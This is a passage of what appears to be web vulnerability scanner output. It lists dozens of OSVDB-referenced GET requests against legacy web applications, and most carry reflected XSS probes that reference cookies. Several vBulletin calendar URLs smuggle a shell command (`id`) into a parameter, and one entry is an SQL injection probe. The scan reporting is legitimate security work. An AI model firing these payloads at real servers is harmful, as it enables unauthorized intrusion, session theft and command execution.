name=Your_Account&amp;op=userinfo&amp;uname=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
name=Surveys&amp;pollID=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The PHPNuke<br>
forum is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
name=Stories_Archive&amp;sa=show_month&amp;year=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;month=3&amp;month_l=test : The PHPNuke forum is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
name<br>
=<br>
Stories_Archive<br>
&amp;sa=show_month&amp;year=2002&amp;month=03&amp;month_l=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
name<br>
=<br>
Downloads<br>
&amp;d_op=viewdownloaddetails&amp;lid=02&amp;ttitle=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : This install of PHPNuke is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
name<br>
=<br>
Classifieds<br>
&amp;op=ViewAds&amp;id_subcatg=75&amp;id_catg=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg<br>
%20src=javascript:alert(document.cookie);<br>
%3E&amp;op=modload&amp;name=Members_List&amp;file=index : Post Nuke 0.7.2.3-<br>
Phoenix is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /members.asp?SF=%22;}alert(&#39;Vulnerable&#39;);function%20x()<br>
{v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /megabook/admin.cgi?login=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Megabook guestbook is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?<br>
Action=&lt;script&gt;alert(\&quot;Vulnerable\&quot;)&lt;/script&gt; : IBM Directory Server<br>
4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.<br>
+ OSVDB-0: GET /launch.jsp?<br>
NFuse_Application=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : NFuse is<br>
vulnerable to cross site scripting (XSS) in the GetLastError function.<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /launch.asp?<br>
NFuse_Application=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : NFuse is<br>
vulnerable to cross site scripting (XSS) in the GetLastError function.<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /isapi/testisa.dll?<br>
check1=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?file=Liens&amp;op=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;);&lt;/script&gt; : Nuked-klan 1.3b is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?<br>
action=storenew&amp;username=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup<br>
page. CA-200-02.<br>
+ OSVDB-0: GET /index.php/content/search/?<br>
SectionID=3&amp;SearchText=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : eZ<br>
publish v3 and prior allow Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php/content/advancedsearch/?<br>
SearchText=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt;&amp;PhraseSearchText=&lt;script&gt;alert(document.cookie)&lt;/<br>
script<br>
 &gt;<br>
&amp;SearchContentClassID<br>
=-1&amp;SearchSectionID=-1&amp;SearchDate=-1&amp;SearchButton=Search : eZ publish<br>
v3 and prior allow Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /gallery/search.php?<br>
searchstring=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Gallery 1.3.4<br>
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the<br>
latest version. <a href="http://www.securityfocus.com/bid/8288" target="_blank">http://www.securityfocus.com/bid/8288</a>.<br>
+ OSVDB-0: GET /friend.php?<br>
op=SiteSent&amp;fname=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This version<br>
of PHP-Nuke&#39;s friend.php is vulnerable to Cross Site Scripting (XSS).<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /forum_members.asp?find=<br>
%22;}alert(&#39;Vulnerable&#39;);function%20x(){v%20=%22 : Web Wiz Forums ver.<br>
7.01 and below is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /forums/index.php?<br>
board<br>
=<br>
;action<br>
=<br>
login2<br>
&amp;user<br>
=<br>
USERNAME&amp;cookielength=120&amp;passwrd=PASSWORD&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : YaBB is vulnerable to Cross Site Scripting (XSS) in the<br>
password field of the login page. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /error/500error.jsp?et=1&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is<br>
vulnerable to Cross Site Scripting (XSS) in the error pages. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /download.php?<br>
sortby=&amp;dcategory=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This version<br>
of PHP-Nuke&#39;s download.php is vulnerable to Cross Site Scripting<br>
(XSS). Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /comments.php?subject=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;comment=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;pid=0&amp;sid=0&amp;mode=&amp;order=&amp;thold=op=Preview : This version of<br>
PHP-Nuke&#39;s comments.php is vulnerable to Cross Site Scripting (XSS).<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /cleartrust/ct_logon.asp?<br>
CTLoginErrorMsg=&lt;script&gt;alert(1)&lt;/script&gt; : RSA ClearTrust allows<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?<br>
query=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This CGI is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?<br>
query=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This CGI is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /calendar.php?year=&lt;script&gt;alert(document.cookie);&lt;/<br>
script&gt;&amp;month=03&amp;day=05 : DCP-Portal v5.3.1 is vulnerable to  Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&amp;REFPAGE=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Actinic E-Commerce services<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&amp;hop=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;PATH=acatalog%2f : Actinic E-<br>
Commerce services is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /article.cfm?id=1&#39;&lt;script&gt;alert(document.cookie);&lt;/<br>
script&gt; : With malformed URLS, Coldfusion is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /apps/web/vs_diag.cgi?<br>
server=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Zeus 4.2r2<br>
(webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /addressbook/index.php?<br>
surname=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phpgroupware 0.9.14.003<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /addressbook/index.php?<br>
name=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phpgroupware 0.9.14.003 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /a?&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Server is<br>
vulnerable to Cross Site Scripting (XSS) in the error message if code<br>
is passed in the query-string. This may be a Null HTTPd server.<br>
+ OSVDB-9239: GET /mailman/admin/ml-name?<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;; : Mailmain is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3092: GET /sitemap.xml : This gives a nice listing of the site<br>
content.<br>
+ OSVDB-25499: GET /affich.php?image=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : GPhotos index.php rep Variable XSS.<br>
+ OSVDB-25498: GET /diapo.php?rep=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : GPhotos index.php rep Variable XSS.<br>
+ OSVDB-25497: GET /index.php?rep=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : GPhotos index.php rep Variable XSS.<br>
+ OSVDB-700: GET /fcgi-bin/echo?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-19947: GET /apps/web/index.fcgi?<br>
servers=&amp;section=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Zeus Admin<br>
server 4.1r2 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-12606: GET /index.php?err=3&amp;email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12607: GET /forgot_password.php?email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12606: GET /bugs/index.php?err=3&amp;email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12607: GET /bugs/forgot_password.php?email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12606: GET /eventum/index.php?err=3&amp;email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12607: GET /eventum/forgot_password.php?email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-2119: GET /shopexd.asp?catalogid=&#39;42 : VP-ASP Shopping Cart<br>
5.0 contains multiple SQL injection vulnerabilities. <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0560" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0560</a><br>
, <a href="http://www.securityfocus.com/bid/8159" target="_blank">http://www.securityfocus.com/bid/8159</a><br>
+ OSVDB-2562: GET /login/sm_login_screen.php?error=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=&lt;script&gt;alert(\&quot;test\&quot;)&lt;/<br>
script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-2695: GET /photo/ : My Photo Gallery pre 3.6 contains multiple<br>
vulnerabilities including .. traversal, unspecified vulnerabilities,<br>
and remote management interface access.<br>
+ OSVDB-2790: GET /index.php?vo=\&quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/<br>
script&gt; : Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp?<br>
id=1&amp;cat=&lt;script&gt;alert(&#39;test&#39;)&lt;/script&gt; : VP-ASP prior to 4.50 are<br>
vulnerable to XSS attacks<br>
+ OSVDB-3092: GET /archive/ : This might be interesting...<br>
+ OSVDB-3092: GET /clients/ : This might be interesting...<br>
+ OSVDB-3092: GET /directory/ : This might be interesting...<br>
+ OSVDB-3092: GET /forum/ : This might be interesting...<br>
+ OSVDB-3092: GET /home/ : This might be interesting...<br>
+ OSVDB-3092: GET /mp3/ : This might be interesting...<br>
+ OSVDB-3092: GET /new : This may be interesting...<br>
+ OSVDB-3092: GET /new/ : This might be interesting...<br>
+ OSVDB-3092: GET /news : This may be interesting...<br>
+ OSVDB-17670: GET /vc30/ : Site Server sample files.  This might be<br>
interesting...<br>
+ OSVDB-3093: GET /adv/gm001-mc/ : This might be interesting... has<br>
been seen in web logs from an unknown scanner.<br>
+ OSVDB-3233: GET /netbasic/websinfo.bas : Novell Netware 5.1 contains<br>
Novonyx default files which reveal system information. All default<br>
files should be removed.<br>
+ OSVDB-3280: GET /forum/memberlist.php?<br>
s=23c37cf1af5d2ad05f49361b0407ad9e&amp;what=\&quot;&gt;<br>
\&quot;&lt;script&gt;javascript:alert(document.cookie)&lt;/script&gt; : Vbulletin 2.2.9<br>
and below are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3289: GET /firewall/policy/dlg?<br>
q=-1&amp;fzone=t&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&gt;&amp;tzone=dmz :<br>
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities<br>
in various administrative pages.<br>
+ OSVDB-3294: GET /firewall/policy/policy?<br>
fzone=internal&amp;tzone=dmz1&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities<br>
in various administrative pages.<br>
+ OSVDB-3295: GET /antispam/listdel?<br>
file=blacklist&amp;name=b&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;startline=0 : Fortigate firewall 2.50 and prior contains<br>
several CSS vulnerabilities in various administrative pages.<br>
+ OSVDB-3295: GET /antispam/listdel?<br>
file=whitelist&amp;name=a&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;startline=0(naturally) : Fortigate firewall 2.50 and prior<br>
contains several CSS vulnerabilities in various administrative pages.<br>
+ OSVDB-3296: GET /theme1/selector?<br>
button=status,monitor,session&amp;button_url=/system/status/status,/system/<br>
status/moniter\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;,/system/status/<br>
session : Fortigate firewall 2.50 and prior contains several CSS<br>
vulnerabilities in various administrative pages.<br>
+ OSVDB-3296: GET /theme1/selector?<br>
button=status,monitor,session&amp;button_url=/system/status/status<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;,/system/status/moniter,/system/<br>
status/session : Fortigate firewall 2.50 and prior contains several<br>
CSS vulnerabilities in various administrative pages.<br>
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;button_url=/system/status/<br>
status,/system/status/moniter,/system/status/session : Fortigate<br>
firewall 2.50 and prior contains several CSS vulnerabilities in<br>
various administrative pages.<br>
+ OSVDB-3299: GET /forumscalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /forumzcalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /htforumcalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /vbcalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /vbulletincalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp?<br>
person=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : BEA WebLogic 8.1 and<br>
below are vulnerable to Cross Site Scripting (XSS) in example code. <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624</a><br>

. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Ecometry&#39;s SGDynamo is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375</a>. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>

.<br>
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi?<br>
key=0&amp;cartname=axa200135022551089&amp;desc=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Aktivate Shopping Cart 1.03 and lower are vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.allen0keul.com/aktivate/" target="_blank">http://www.allen0keul.com/aktivate/</a> <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212</a><br>

, <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4262: GET /addressbook.php?\&quot;&gt;&lt;script&gt;alert(Vulnerable)&lt;/<br>
script&gt;&lt;!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4265: GET /help.php?chapter=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=&lt;script&gt;alert(\&quot;test\&quot;)&lt;/<br>
script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-4357: GET /acart2_0/error.asp?msg=&lt;script&gt;alert(\&quot;test\&quot;)&lt;/<br>
script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=&lt;script&gt;alert(\&quot;test<br>
\&quot;)&lt;/script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=&lt;script&gt;alert(\&quot;test<br>
\&quot;)&lt;/script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-5097: GET /wwwping/index.stm?<br>
wwwsite=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server<br>
default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/create.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
